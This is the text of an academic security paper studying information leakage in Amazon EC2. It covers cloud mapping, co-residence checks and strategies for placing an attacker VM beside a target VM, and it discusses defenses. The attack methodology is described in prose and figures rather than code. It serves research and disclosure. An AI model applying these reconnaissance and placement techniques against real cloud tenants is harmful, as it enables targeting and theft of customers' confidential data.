Hey, You, Get Off of My Cloud: Exploring Information Leakage in Third-Party Compute Clouds

Page created by Perry Peterson
 
CONTINUE READING
Hey, You, Get Off of My Cloud:
                                     Exploring Information Leakage in
                                       Third-Party Compute Clouds

                   Thomas Ristenpart∗                       Eran Tromer†             Hovav Shacham∗             Stefan Savage∗
     ∗                                                                           †
         Dept. of Computer Science and Engineering                               Computer Science and Artificial Intelligence Laboratory
          University of California, San Diego, USA                               Massachusetts Institute of Technology, Cambridge, USA
           {tristenp,hovav,savage}@cs.ucsd.edu                                                   tromer@csail.mit.edu

ABSTRACT                                                                              core computing and software capabilities are outsourced on
Third-party cloud computing represents the promise of out-                            demand to shared third-party infrastructure. While this
sourcing as applied to computation. Services, such as Mi-                             model, exemplified by Amazon’s Elastic Compute Cloud
crosoft’s Azure and Amazon’s EC2, allow users to instanti-                            (EC2) [5], Microsoft’s Azure Service Platform [20], and Rack-
ate virtual machines (VMs) on demand and thus purchase                                space’s Mosso [27] provides a number of advantages — in-
precisely the capacity they require when they require it.                             cluding economies of scale, dynamic provisioning, and low
In turn, the use of virtualization allows third-party cloud                           capital expenditures — it also introduces a range of new risks.
providers to maximize the utilization of their sunk capital                              Some of these risks are self-evident and relate to the new
costs by multiplexing many customer VMs across a shared                               trust relationship between customer and cloud provider. For
physical infrastructure. However, in this paper, we show                              example, customers must trust their cloud providers to re-
that this approach can also introduce new vulnerabilities.                            spect the privacy of their data and the integrity of their
Using the Amazon EC2 service as a case study, we show that                            computations. However, cloud infrastructures can also in-
it is possible to map the internal cloud infrastructure, iden-                        troduce non-obvious threats from other customers due to
tify where a particular target VM is likely to reside, and then                       the subtleties of how physical resources can be transparently
instantiate new VMs until one is placed co-resident with the                          shared between virtual machines (VMs).
target. We explore how such placement can then be used to                                In particular, to maximize efficiency multiple VMs may
mount cross-VM side-channel attacks to extract information                            be simultaneously assigned to execute on the same physi-
from a target VM on the same machine.                                                 cal server. Moreover, many cloud providers allow “multi-
                                                                                      tenancy” — multiplexing the virtual machines of disjoint
                                                                                      customers upon the same physical hardware. Thus it is con-
Categories and Subject Descriptors                                                    ceivable that a customer’s VM could be assigned to the same
K.6.5 [Security and Protection]: UNAUTHORIZED AC-                                     physical server as their adversary. This in turn, engenders
CESS                                                                                  a new threat — that the adversary might penetrate the iso-
                                                                                      lation between VMs (e.g., via a vulnerability that allows
General Terms                                                                         an “escape” to the hypervisor or via side-channels between
                                                                                      VMs) and violate customer confidentiality. This paper ex-
Security, Measurement, Experimentation                                                plores the practicality of mounting such cross-VM attacks
                                                                                      in existing third-party compute clouds.
Keywords                                                                                 The attacks we consider require two main steps: place-
Cloud computing, Virtual machine security, Side channels                              ment and extraction. Placement refers to the adversary ar-
                                                                                      ranging to place their malicious VM on the same physical
1. INTRODUCTION                                                                       machine as that of a target customer. Using Amazon’s EC2
                                                                                      as a case study, we demonstrate that careful empirical “map-
  It has become increasingly popular to talk of “cloud com-                           ping” can reveal how to launch VMs in a way that maximizes
puting” as the next infrastructure for hosting data and de-                           the likelihood of an advantageous placement. We find that
ploying software and services. In addition to the plethora of                         in some natural attack scenarios, just a few dollars invested
technical approaches associated with the term, cloud com-                             in launching VMs can produce a 40% chance of placing a
puting is also used to refer to a new business model in which                         malicious VM on the same physical server as a target cus-
                                                                                      tomer. Using the same platform we also demonstrate the
                                                                                      existence of simple, low-overhead, “co-residence” checks to
Permission to make digital or hard copies of all or part of this work for             determine when such an advantageous placement has taken
personal or classroom use is granted without fee provided that copies are             place. While we focus on EC2, we believe that variants
not made or distributed for profit or commercial advantage and that copies            of our techniques are likely to generalize to other services,
bear this notice and the full citation on the first page. To copy otherwise, to       such as Microsoft’s Azure [20] or Rackspace’s Mosso [27], as
republish, to post on servers or to redistribute to lists, requires prior specific    we only utilize standard customer capabilities and do not
permission and/or a fee.
                                                                                      require that cloud providers disclose details of their infras-
CCS’09, November 9–13, 2009, Chicago, Illinois, USA.
Copyright 2009 ACM 978-1-60558-352-5/09/11 ...$10.00.                                 tructure or assignment policies.
Having managed to place a VM co-resident with the tar-            In this setting, we consider two kinds of attackers: those
get, the next step is to extract confidential information via     who cast a wide net and are interested in being able to attack
a cross-VM attack. While there are a number of avenues            some known hosted service and those focused on attacking a
for such an attack, in this paper we focus on side-channels:      particular victim service. The latter’s task is more expensive
cross-VM information leakage due to the sharing of physical       and time-consuming than the former’s, but both rely on the
resources (e.g., the CPU’s data caches). In the multi-process     same fundamental attack.
environment, such attacks have been shown to enable ex-              In this work, we initiate a rigorous research program aimed
traction of RSA [26] and AES [22] secret keys. However, we        at exploring the risk of such attacks, using a concrete cloud
are unaware of published extensions of these attacks to the       service provider (Amazon EC2) as a case study. We address
virtual machine environment; indeed, there are significant        these concrete questions in subsequent sections:
practical challenges in doing so.                                 • Can one determine where in the cloud infrastructure an
   We show preliminary results on cross-VM side channel at-         instance is located? (Section 5)
tacks, including a range of building blocks (e.g., cache load     • Can one easily determine if two instances are co-resident
measurements in EC2) and coarse-grained attacks such as             on the same physical machine? (Section 6)
measuring activity burst timing (e.g., for cross-VM keystroke     • Can an adversary launch instances that will be co-resident
monitoring). These point to the practicality of side-channel        with other user’s instances? (Section 7)
attacks in cloud-computing environments.
                                                                  • Can an adversary exploit cross-VM information leakage
   Overall, our results indicate that there exist tangible dan-
                                                                    once co-resident? (Section 8)
gers when deploying sensitive tasks to third-party compute
                                                                  Throughout we offer discussions of defenses a cloud provider
clouds. In the remainder of this paper, we explain these
                                                                  might try in order to prevent the success of the various at-
findings in more detail and then discuss means to mitigate
                                                                  tack steps.
the problem. We argue that the best solution is for cloud
providers to expose this risk explicitly and give some place-
ment control directly to customers.                               3.   THE EC2 SERVICE
                                                                     By far the best known example of a third-party compute
2. THREAT MODEL                                                   cloud is Amazon’s Elastic Compute Cloud (EC2) service,
   As more and more applications become exported to third-        which enables users to flexibly rent computational resources
party compute clouds, it becomes increasingly important to        for use by their applications [5]. EC2 provides the ability
quantify any threats to confidentiality that exist in this set-   to run Linux, FreeBSD, OpenSolaris and Windows as guest
ting. For example, cloud computing services are already           operating systems within a virtual machine (VM) provided
used for e-commerce applications, medical record services [7,     by a version of the Xen hypervisor [9].1 The hypervisor
11], and back-office business applications [29], all of which     plays the role of a virtual machine monitor and provides
require strong confidentiality guarantees. An obvious threat      isolation between VMs, intermediating access to physical
to these consumers of cloud computing is malicious behav-         memory and devices. A privileged virtual machine, called
ior by the cloud provider, who is certainly in a position to      Domain0 (Dom0) in the Xen vernacular, is used to manage
violate customer confidentiality or integrity. However, this      guest images, their physical resource provisioning, and any
is a known risk with obvious analogs in virtually any in-         access control rights. In EC2 the Dom0 VM is configured
dustry practicing outsourcing. In this work, we consider          to route packets for its guest images and reports itself as a
the provider and its infrastructure to be trusted. This also      hop in traceroutes.
means we do not consider attacks that rely upon subverting           When first registering with EC2, each user creates an ac-
a cloud’s administrative functions, via insider abuse or vul-     count — uniquely specified by its contact e-mail address —
nerabilities in the cloud management systems (e.g., virtual       and provides credit card information for billing compute and
machine monitors).                                                I/O charges. With a valid account, a user creates one or
   In our threat model, adversaries are non-provider-affiliated   more VM images, based on a supplied Xen-compatible ker-
malicious parties. Victims are users running confidentiality-     nel, but with an otherwise arbitrary configuration. He can
requiring services in the cloud. A traditional threat in such a   run one or more copies of these images on Amazon’s network
setting is direct compromise, where an attacker attempts re-      of machines. One such running image is called an instance,
mote exploitation of vulnerabilities in the software running      and when the instance is launched, it is assigned to a single
on the system. Of course, this threat exists for cloud appli-     physical machine within the EC2 network for its lifetime;
cations as well. These kinds of attacks (while important) are     EC2 does not appear to currently support live migration of
a known threat and the risks they present are understood.         instances, although this should be technically feasible. By
   We instead focus on where third-party cloud computing          default, each user account is limited to 20 concurrently run-
gives attackers novel abilities; implicitly expanding the at-     ning instances.
tack surface of the victim. We assume that, like any cus-            In addition, there are three degrees of freedom in specify-
tomer, a malicious party can run and control many instances       ing the physical infrastructure upon which instances should
in the cloud, simply by contracting for them. Further, since      run. At the time of this writing, Amazon provides two
the economies offered by third-party compute clouds derive        “regions”, one located in the United States and the more
from multiplexing physical infrastructure, we assume (and         recently established one in Europe. Each region contains
later validate) that an attacker’s instances might even run       three “availability zones” which are meant to specify in-
on the same physical hardware as potential victims. From          frastructures with distinct and independent failure modes
this vantage, an attacker might manipulate shared physical        1
                                                                   We will limit our subsequent discussion to the Linux ker-
resources (e.g., CPU caches, branch target buffers, network       nel. The same issues should apply for other guest operating
queues, etc.) to learn otherwise confidential information.        systems.
(e.g., with separate power and network connectivity). When        acceptable use policy, whereas external probing is not (we
requesting launch of an instance, a user specifies the re-        discuss the legal, ethical and contractual issues around such
gion and may choose a specific availability zone (otherwise       probing in Appendix A).
one is assigned on the user’s behalf). As well, the user            We use DNS resolution queries to determine the external
can specify an “instance type”, indicating a particular com-      name of an instance and also to determine the internal IP
bination of computational power, memory and persistent            address of an instance associated with some public IP ad-
storage space available to the virtual machine. There are         dress. The latter queries are always performed from an EC2
five Linux instance types documented at present, referred         instance.
to as ‘m1.small’, ‘c1.medium’, ‘m1.large’, ‘m1.xlarge’, and
‘c1.xlarge’. The first two are 32-bit architectures, the latter
three are 64-bit. To give some sense of relative scale, the       5.   CLOUD CARTOGRAPHY
“small compute slot” (m1.small) is described as a single vir-        In this section we ‘map’ the EC2 service to understand
tual core providing one ECU (EC2 Compute Unit, claimed to         where potential targets are located in the cloud and the
be equivalent to a 1.0–1.2 GHz 2007 Opteron or 2007 Xeon          instance creation parameters needed to attempt establish-
processor) combined with 1.7 GB of memory and 160 GB              ing co-residence of an adversarial instance. This will speed
of local storage, while the “large compute slot” (m1.large)       up significantly adversarial strategies for placing a malicious
provides 2 virtual cores each with 2 ECUs, 7.5GB of mem-          VM on the same machine as a target. In the next section we
ory and 850GB of local storage. As expected, instances with       will treat the task of confirming when successful co-residence
more resources incur greater hourly charges (e.g., ‘m1.small’     is achieved.
in the United States region is currently $0.10 per hour, while       To map EC2, we begin with the hypothesis that different
‘m1.large’ is currently $0.40 per hour). When launching an        availability zones are likely to correspond to different inter-
instance, the user specifies the instance type along with a       nal IP address ranges and the same may be true for instance
compatible virtual machine image.                                 types as well. Thus, mapping the use of the EC2 internal
   Given these constraints, virtual machines are placed on        address space allows an adversary to determine which IP ad-
available physical servers shared among multiple instances.       dresses correspond to which creation parameters. Moreover,
Each instance is given Internet connectivity via both an          since EC2’s DNS service provides a means to map public IP
external IPv4 address and domain name and an internal             address to private IP address, an adversary might use such a
RFC 1918 private address and domain name. For example,            map to infer the instance type and availability zone of a tar-
an instance might be assigned external IP 75.101.210.100,         get service — thereby dramatically reducing the number of
external name ec2-75-101-210-100.compute-1.amazonaws              instances needed before a co-resident placement is achieved.
.com, internal IP 10.252.146.52, and internal name domU-             We evaluate this theory using two data sets: one created
12-31-38-00-8D-C6.compute-1.internal. Within the cloud,           by enumerating public EC2-based web servers using external
both domain names resolve to the internal IP address; out-        probes and translating responsive public IPs to internal IPs
side the cloud the external name is mapped to the external        (via DNS queries within the cloud), and another created by
IP address.                                                       launching a number of EC2 instances of varying types and
   Note that we focus on the United States region — in the        surveying the resulting IP address assigned.
rest of the paper EC2 implicitly means this region of EC2.           To fully leverage the latter data, we present a heuristic
                                                                  algorithm that helps label /24 prefixes with an estimate of
4. NETWORK PROBING                                                the availability zone and instance type of the included Inter-
   In the next several sections, we describe an empirical mea-    nal IPs. These heuristics utilize several beneficial features
surement study focused on understanding VM placement              of EC2’s addressing regime. The output of this process is a
in the EC2 system and achieving co-resident placement for         map of the internal EC2 address space which allows one to
an adversary. To do this, we make use of network probing          estimate the availability zone and instance type of any tar-
both to identify public services hosted on EC2 and to pro-        get public EC2 server. Next, we enumerate a set of public
vide evidence of co-residence (that two instances share the       EC2-based Web servers
same physical server). In particular, we utilize nmap, hping,     Surveying public servers on EC2. Utilizing WHOIS
and wget to perform network probes to determine liveness          queries, we identified four distinct IP address prefixes, a /16,
of EC2 instances. We use nmap to perform TCP connect              /17, /18, and /19, as being associated with EC2. The last
probes, which attempt to complete a 3-way hand-shake be-          three contained public IPs observed as assigned to EC2 in-
tween a source and target. We use hping to perform TCP            stances. We had not yet observed EC2 instances with public
SYN traceroutes, which iteratively sends TCP SYN pack-            IPs in the /16, and therefore did not include it in our sur-
ets with increasing time-to-lives (TTLs) until no ACK is          vey. For the remaining IP addresses (57 344 IP addresses),
received. Both TCP connect probes and SYN traceroutes             we performed a TCP connect probe on port 80. This re-
require a target port; we only targeted ports 80 or 443. We       sulted in 11 315 responsive IPs. Of these 9 558 responded
used wget to retrieve web pages, but capped so that at most       (with some HTTP response) to a follow-up wget on port
1024 bytes are retrieved from any individual web server.          80. We also performed a TCP port 443 scan of all 57 344 IP
   We distinguish between two types of probes: external           addresses, which resulted in 8 375 responsive IPs. Via an ap-
probes and internal probes. A probe is external when it           propriate DNS lookup from within EC2, we translated each
originates from a system outside EC2 and has destination          public IP address that responded to either the port 80 or
an EC2 instance. A probe is internal if it originates from        port 443 scan into an internal EC2 address. This resulted in
an EC2 instance (under our control) and has destination           a list of 14 054 unique internal IPs. One of the goals of this
another EC2 instance. This dichotomy is of relevance par-         section is to enable identification of the instance type and
ticularly because internal probing is subject to Amazon’s         availability zone of one or more of these potential targets.
IP address mod 64                                          Zone 1           Zone 2           Zone 3
                        64

                        32

                         0
                               10.249.0.0   10.250.0.0     10.251.0.0      10.252.0.0      10.253.0.0    10.254.0.0     10.255.0.0
                                                                        Internal IP address
 Account B Account A

                                    c1.medium            c1.xlarge           m1.large            m1.small           m1.xlarge
                        64
                        32
                         0
                        64
                        32
                         0
                       10.252.0.0                                           10.253.0.0                                               10.254.0.0
                                                                        Internal IP address
Figure 1: (Top) A plot of the internal IP addresses assigned to instances launched during the initial mapping exper-
iment using Account A. (Bottom) A plot of the internal IP addresses of instances launched in Zone 3 by Account A
and, 39 hours later, by Account B. Fifty-five of the Account B IPs were repeats of those assigned to instances for
Account A.

Instance placement parameters. Recall that there are                                    88 had unique /24 prefixes, while six of the /24 prefixes had
three availability zones and five instance types in the present                         two instances each. A single /24 had both an m1.large and
EC2 system. While these parameters could be assigned in-                                an m1.xlarge instance. No IP addresses were ever observed
dependently from the underlying infrastructure, in practice                             being assigned to more than one instance type. Of the 100
this is not so. In particular, the Amazon EC2 internal IP ad-                           Acount B IP’s, 55 were repeats of IP addresses assigned to
dress space is cleanly partitioned between availability zones                           instances for Acount A.
(likely to make it easy to manage separate network con-                                 A fuller map of EC2. We would like to infer the instance
nectivity for these zones) and instance types within these                              type and availability zone of any public EC2 instance, but
zones also show considerable regularity. Moreover, different                            our sampling data is relatively sparse. We could sample
accounts exhibit similar placement.                                                     more (and did), but to take full advantage of the sampling
   To establish these facts, we iteratively launched 20 in-                             data at hand we should take advantage of the significant
stances for each of the 15 availability zone/instance type                              regularity of the EC2 addressing regime. For example, the
pairs. We used a single account, call it “Account A”. The top                           above data suggests that /24 prefixes rarely have IPs as-
graph in Figure 1 depicts a plot of the internal IP address                             signed to distinct instance types. We utilized data from
assigned to each of the 300 instances, partitioned according                            4 499 instances launched under several accounts under our
to availability zone. It can be readily seen that the sam-                              control; these instances were also used in many of the exper-
ples from each zone are assigned IP addresses from disjoint                             iments described in the rest of the paper. These included
portions of the observed internal address space. For ex-                                977 unique internal IPs and 611 unique Dom0 IPs associated
ample, samples from Zone 3 were assigned addresses within                               with these instances.
10.252.0.0/16 and from discrete prefixes within 10.253.0.0/16.                             Using manual inspection of the resultant data, we derived
If we make the assumption that internal IP addresses are                                a set of heuristics to label /24 prefixes with both availability
statically assigned to physical machines (doing otherwise                               zone and instance type:
would make IP routing far more difficult to implement), this
data supports the assessment that availability zones use sep-                           • All IPs from a /16 are from the same availability zone.
arate physical infrastructure. Indeed, none of the data gath-                           • A /24 inherits any included sampled instance type. If there
ered in the rest of the paper’s described experiments have                                are multiple instances with distinct types, then we label the
cast doubt on this conclusion.                                                            /24 with each distinct type (i.e., it is ambiguous).
   While it is perhaps not surprising that availability zones                           • A /24 containing a Dom0 IP address only contains Dom0
enjoy disjoint IP assignment, what about instance type and                                IP addresses. We associate to this /24 the type of the
accounts? We launched 100 instances (20 of each type, 39                                  Dom0’s associated instance.
hours after terminating the Account A instances) in Zone
3 from a second account, “Account B”. The bottom graph                                  • All /24’s between two consecutive Dom0 /24’s inherit the
in Figure 1 plots the Zone 3 instances from Account A and                                 former’s associated type.
Account B, here using distinct labels for instance type. Of                             The last heuristic, which enables us to label /24’s that have
the 100 Account A Zone 3 instances, 92 had unique /24                                   no included instance, is derived from the observation that
prefixes, while eight /24 prefixes each had two instances,                              Dom0 IPs are consistently assigned a prefix that immedi-
though of the same type. Of the 100 Account B instances,                                ately precedes the instance IPs they are associated with.
                                                                                        (For example, 10.250.8.0/24 contained Dom0 IPs associated
with m1.small instances in prefixes 10.254.9.0/24 and            port) from another instance and inspecting the last hop. For
10.254.10.0/24.) There were 869 /24’s in the data, and ap-       the second test, we noticed that round-trip times (RTTs) re-
plying the heuristics resulted in assigning a unique zone and    quired a “warm-up”: the first reported RTT in any sequence
unique type to 723 of these; a unique zone and two types to      of probes was almost always an order of magnitude slower
23 of these; and left 123 unlabeled. These last were due to      than subsequent probes. Thus for this method we perform
areas (such as the lower portion of 10.253.0.0/16) for which     10 probes and just discard the first. The third check makes
we had no sampling data at all.                                  use of the manner in which internal IP addresses appear to
  While the map might contain errors (for example, in areas      be assigned by EC2. The same Dom0 IP will be shared by in-
of low instance sample numbers), we have yet to encounter        stances with a contiguous sequence of internal IP addresses.
an instance that contradicts the /24 labeling and we used        (Note that m1.small instances are reported by CPUID as
the map for many of the future experiments. For instance,        having two CPUs each with two cores and these EC2 in-
we applied it to a subset of the public servers derived from     stance types are limited to 50% core usage, implying that
our survey, those that responded to wget requests with an        one such machine could handle eight instances.)
HTTP 200 or 206. The resulting 6 057 servers were used as        Veracity of the co-residence checks. We verify the cor-
stand-ins for targets in some of the experiments in Section 7.   rectness of our network-based co-residence checks using as
Figure 7 in the appendix graphs the result of mapping these      ground truth the ability to send messages over a cross-VM
servers.                                                         covert channel. That is, if two instances (under our control)
Preventing cloud cartography. Providers likely have in-          can successfully transmit via the covert channel then they
centive to prevent cloud cartography for several reasons, be-    are co-resident, otherwise not. If the checks above (which do
yond the use we outline here (that of exploiting placement       not require both instances to be under our control) have suf-
vulnerabilities). Namely, they might wish to hide their in-      ficiently low false positive rates relative to this check, then
frastructure and the amount of use it is enjoying by cus-        we can use them for inferring co-residence against arbitrary
tomers. Several features of EC2 made cartography signif-         victims. We utilized for this experiment a hard-disk-based
icantly easier. Paramount is that local IP addresses are         covert channel. At a very high level, the channel works as
statically (at least over the observed period of time) as-       follows. To send a one bit, the sender instance reads from
sociated to availability zone and instance type. Changing        random locations on a shared disk volume. To send a zero
this would likely make administration tasks more challeng-       bit, the sender does nothing. The receiver times reading
ing (and costly) for providers. Also, using the map requires     from a fixed location on the disk volume. Longer read times
translating a victim instance’s external IP to an internal       mean a 1 is being set, shorter read times give a 0.
IP, and the provider might inhibit this by isolating each           We performed the following experiment. Three EC2 ac-
account’s view of the internal IP address space (e.g. via        counts were utilized: a control, a victim, and a probe. (The
VLANs and bridging). Even so, this would only appear to          “victim” and “probe” are arbitrary labels, since they were
slow down our particular technique for locating an instance      both under our control.) All instances launched were of
in the LAN — one might instead use ping timing measure-          type m1.small. Two instances were launched by the control
ments or traceroutes (both discuss more in the next section)     account in each of the three availability zones. Then 20 in-
to help “triangulate” on a victim.                               stances on the victim account and 20 instances on the probe
                                                                 account were launched, all in Zone 3. We determined the
                                                                 Dom0 IPs of each instance. For each (ordered) pair (A, B)
6. DETERMINING CO-RESIDENCE                                      of these 40 instances, if the Dom0 IPs passed (check 1) then
  Given a set of targets, the EC2 map from the previous          we had A probe B and each control to determine packet
section educates choice of instance launch parameters for        RTTs and we also sent a 5-bit message from A to B over
attempting to achieve placement on the same physical ma-         the hard-drive covert channel.
chine. Recall that we refer to instances that are running           We performed three independent trials. These generated,
on the same physical machine as being co-resident. In this       in total, 31 pairs of instances for which the Dom0 IPs were
section we describe several easy-to-implement co-residence       equal. The internal IP addresses of each pair were within 7
checks. Looking ahead, our eventual check of choice will be      of each other. Of the 31 (potentially) co-resident instance
to compare instances’ Dom0 IP addresses. We confirm the          pairs, 12 were ‘repeats’ (a pair from a later round had the
accuracy of this (and other) co-residence checks by exploit-     same Dom0 as a pair from an earlier round).
ing a hard-disk-based covert channel between EC2 instances.         The 31 pairs give 62 ordered pairs. The hard-drive covert
Network-based co-residence checks. Using our expe-               channel successfully sent a 5-bit message for 60 of these
rience running instances while mapping EC2 and inspect-          pairs. The last two failed due to a single bit error each, and
ing data collected about them, we identify several poten-        we point out that these two failures were not for the same
tial methods for checking if two instances are co-resident.      pair of instances (i.e. sending a message in the reverse direc-
Namely, instances are likely co-resident if they have            tion succeeded). The results of the RTT probes are shown
(1) matching Dom0 IP address,                                    in Figure 2. The median RTT for co-resident instances was
                                                                 significantly smaller than those to any of the controls. The
(2) small packet round-trip times, or
                                                                 RTTs to the controls in the same availability zone as the
(3) numerically close internal IP addresses (e.g. within 7).     probe (Zone 3) and victim instances were also noticeably
As mentioned, an instance’s network traffic’s first hop is the   smaller than those to other zones.
Dom0 privileged VM. An instance owner can determine its          Discussion. From this experiment we conclude an effec-
Dom0 IP from the first hop on any route out from the in-         tive false positive rate of zero for the Dom0 IP co-residence
stance. One can determine an uncontrolled instance’s Dom0        check. In the rest of the paper we will therefore utilize the
IP by performing a TCP SYN traceroute to it (on some open
Count    Median RTT (ms)             or might even trigger launching of victims, making this at-
      Co-resident instance    62           0.242                  tack scenario practical.
       Zone 1 Control A       62           1.164
       Zone 1 Control B       62           1.027                  Towards understanding placement. Before we describe
       Zone 2 Control A       61           1.113                  these strategies, we first collect several observations we ini-
       Zone 2 Control B       62           1.187                  tially made regarding Amazon’s (unknown) placement algo-
       Zone 3 Control A       62           0.550                  rithms. Subsequent interactions with EC2 only reinforced
       Zone 3 Control B       62           0.436                  these observations.
                                                                     A single account was never seen to have two instances
Figure 2: Median round trip times in seconds for probes           simultaneously running on the same physical machine, so
sent during the 62 co-residence checks.         (A probe to       running n instances in parallel under a single account results
Zone 2 Control A timed out.)                                      in placement on n separate machines. No more than eight
                                                                  m1.small instances were ever observed to be simultaneously
                                                                  co-resident. (This lends more evidence to support our earlier
following when checking for co-residence of an instance with      estimate that each physical machine supports a maximum of
a target instance we do not control. First one compares the       eight m1.small instances.) While a machine is full (assigned
internal IP addresses of the two instances, to see if they are    its maximum number of instances) an attacker has no chance
numerically close. (For m1.small instances close is within        of being assigned to it.
seven.) If this is the case, the instance performs a TCP             We observed strong placement locality. Sequential place-
SYN traceroute to an open port on the target, and sees if         ment locality exists when two instances run sequentially (the
there is only a single hop, that being the Dom0 IP. (This         first terminated before launching the second) are often as-
instantiates the Dom0 IP equivalence check.) Note that this       signed to the same machine. Parallel placement locality
check requires sending (at most) two TCP SYN packets and          exists when two instances run (from distinct accounts) at
is therefore very “quiet”.                                        roughly the same time are often assigned to the same ma-
Obfuscating co-residence. A cloud provider could likely           chine. In our experience, launched instances exhibited both
render the network-based co-residence checks we use moot.         strong sequential and strong parallel locality.
For example, a provider might have Dom0 not respond in               Our experiences suggest a correlation between instance
traceroutes, might randomly assign internal IP addresses at       density, the number of instances assigned to a machine, and
the time of instance launch, and/or might use virtual LANs        a machine’s affinity for having a new instance assigned to
to isolate accounts. If such precautions are taken, attack-       it. In Appendix B we discuss an experiment that revealed a
ers might need to turn to co-residence checks that do not         bias in placement towards machines with fewer instances al-
rely on network measurements. In Section 8.1 we show ex-          ready assigned. This would make sense from an operational
perimentally that side-channels can be utilized to establish      viewpoint under the hypothesis that Amazon balances load
co-residence in a way completely agnostic to network con-         across running machines.
figuration. Even so, inhibiting network-based co-residence           We concentrate in the following on the m1.small instance
checks would impede attackers to some degree, and so de-          type. However, we have also achieved active co-residence
termining the most efficient means of obfuscating internal        between two m1.large instances under our control, and have
cloud infrastructure from adversaries is a good potential av-     observed m1.large and c1.medium instances with co-resident
enue for defense.                                                 commercial instances. Based on the reported (using CPUID)
                                                                  system configurations of the m1.xlarge and c1.xlarge in-
                                                                  stance types, we assume that these instances have machines
7. EXPLOITING PLACEMENT IN EC2                                    to themselves, and indeed we never observed co-residence of
   Consider an adversary wishing to attack one or more EC2        multiple such instances.
instances. Can the attacker arrange for an instance to be
placed on the same physical machine as (one of) these vic-        7.1    Brute-forcing placement
tims? In this section we assess the feasibility of achieving         We start by assessing an obvious attack strategy: run nu-
co-residence with such target victims, saying the attacker is     merous instances over a (relatively) long period of time and
successful if he or she achieves good coverage (co-residence      see how many targets one can achieve co-residence with.
with a notable fraction of the target set). We offer two adver-   While such a brute-force strategy does nothing clever (once
sarial strategies that make crucial use of the map developed      the results of the previous sections are in place), our hypoth-
in Section 5 and the cheap co-residence checks we introduced      esis is that for large target sets this strategy will already
in Section 6. The brute-force strategy has an attacker sim-       allow reasonable success rates.
ply launch many instances over a relatively long period of           The strategy works as follows. The attacker enumerates
time. Such a naive strategy already achieves reasonable suc-      a set of potential target victims. The adversary then infers
cess rates (though for relatively large target sets). A more      which of these targets belong to a particular availability zone
refined strategy has the attacker target recently-launched        and are of a particular instance type using the map from
instances. This takes advantage of the tendency for EC2           Section 5. Then, over some (relatively long) period of time
to assign fresh instances to the same small set of machines.      the adversary repeatedly runs probe instances in the target
Our experiments show that this feature (combined with the         zone and of the target type. Each probe instance checks if
ability to map EC2 and perform co-residence checks) repre-        it is co-resident with any of the targets. If not the instance
sents an exploitable placement vulnerability: measurements        is quickly terminated.
show that the strategy achieves co-residence with a specific         We experimentally gauged this strategy’s potential effi-
(m1.small) instance almost half the time. As we discuss be-       cacy. We utilized as “victims” the subset of public EC2-
low, an attacker can infer when a victim instance is launched     based web servers surveyed in Section 5 that responded with
HTTP 200 or 206 to a wget request on port 80. (This re-          running probe instances temporally near the launch of a
striction is arbitrary. It only makes the task harder since      victim allows the attacker to effectively take advantage of the
it cut down on the number of potential victims.) This left       parallel placement locality exhibited by the EC2 placement
6 577 servers. We targeted Zone 3 and m1.small instances         algorithms.
and used our cloud map to infer which of the servers match          But why would we expect that an attacker can launch
this zone/type. This left 1 686 servers. (The choice of zone     instances soon after a particular target victim is launched?
was arbitrary. The choice of instance type was due to the        Here the dynamic nature of cloud computing plays well into
fact that m1.small instances enjoy the greatest use.) We         the hands of creative adversaries. Recall that one of the
collected data from numerous m1.small probe instances we         main features of cloud computing is to only run servers
launched in Zone 3. (These instances were also used in the       when needed. This suggests that servers are often run on in-
course of our other experiments.) The probes were instru-        stances, terminated when not needed, and later run again.
mented to perform the cheap co-residence check procedure         So for example, an attacker can monitor a server’s state
described at the end of Section 6 for all of the targets. For    (e.g., via network probing), wait until the instance disap-
any co-resident target, the probe performed a wget on port       pears, and then if it reappears as a new instance, engage
80 (to ensure the target was still serving web pages). The       in instance flooding. Even more interestingly, an attacker
wget scan of the EC2 servers was conducted on October 21,        might be able to actively trigger new victim instances due
2008, and the probes we analyzed were launched over the          to the use of auto scaling systems. These automatically grow
course of 18 days, starting on October 23, 2008. The time        the number of instances used by a service to meet increases
between individual probe launches varied, and most were          in demand. (Examples include scalr [30] and RightGrid [28].
launched in sets of 20.                                          See also [6].) We believe clever adversaries can find many
   We analyzed 1 785 such probe instances. These probes          other practical realizations of this attack scenario.
had 78 unique Dom0 IPs. (Thus, they landed on 78 different          The rest of this section is devoted to quantifying several
physical machines.) Of the 1 686 target victims, the probes      aspects of this attack strategy. We assess typical success
achieved co-residency with 141 victim servers. Thus the          rates, whether the availability zone, attacking account, or
“attack” achieved 8.4% coverage of the target set.               the time of day has some bearing on success, and the effect
Discussion. We point out that the reported numbers are           of increased time lag between victim and attacker launches.
conservative in several ways, representing only a lower bound    Looking ahead, 40% of the time the attacker (launching just
on the true success rate. We only report co-residence if the     20 probes) achieves co-residence against a specific target in-
server is still serving web pages, even if the server was ac-    stance; zone, account, and time of day do not meaningfully
tually still running. The gap in time between our survey of      impact success; and even if the adversary launches its in-
the public EC2 servers and the launching of probes means         stances two days after the victims’ launch it still enjoys the
that new web servers or ones that changed IPs (i.e. by being     same rate of success.
taken down and then relaunched) were not detected, even             In the following we will often use instances run by one of
when we in fact achieved co-residence with them. We could        our own accounts as proxies for victims. However we will
have corrected some sources of false negatives by actively       also discuss achieving co-residence with recently launched
performing more internal port scans, but we limited our-         commercial servers. Unless otherwise noted, we use m1.small
selves to probing ports we knew to already be serving public     instances. Co-residence checks were performed via compar-
web pages (as per the discussion in Section 4).                  ison of Dom0 IPs.
   Our results suggest that even a very naive attack strategy    The effects of zone, account, and time of day. We
can successfully achieve co-residence against a not-so-small     start with finding a base-line for success rates when run-
fraction of targets. Of course, we considered here a large       ning probe instances soon (on the order of 5 minutes) af-
target set, and so we did not provide evidence of efficacy       ter victims. The first experiment worked as follows, and
against an individual instance or a small sets of targets. We    was repeated for each availability zone. A victim account
observed very strong sequential locality in the data, which      launched either 1, 10, or 20 instances simultaneously. No
hinders the effectiveness of the attack. In particular, the      sooner than five minutes later, a separate attacker account
growth in target set coverage as a function of number of         requested launch of 20 instances simultaneously. The num-
launched probes levels off quickly. (For example, in the data    ber of collisions (attacker instances co-resident with a victim
above, the first 510 launched probes had already achieved        instance) are reported in the left table of Figure 3. As can
co-residence with 90% of the eventual 141 victims covered.)      be seen, collisions are quickly found for large percentages of
This suggests that fuller coverage of the target set could       victim instances. The availability zone used does not mean-
require many more probes.                                        ingfully affect co-residence rates.
                                                                    We now focus on a single availability zone, Zone 1, for
7.2 Abusing Placement Locality                                   the next experiment. We repeated, at three different time
   We would like to find attack strategies that do better than   periods over the course of a day, the following steps: A sin-
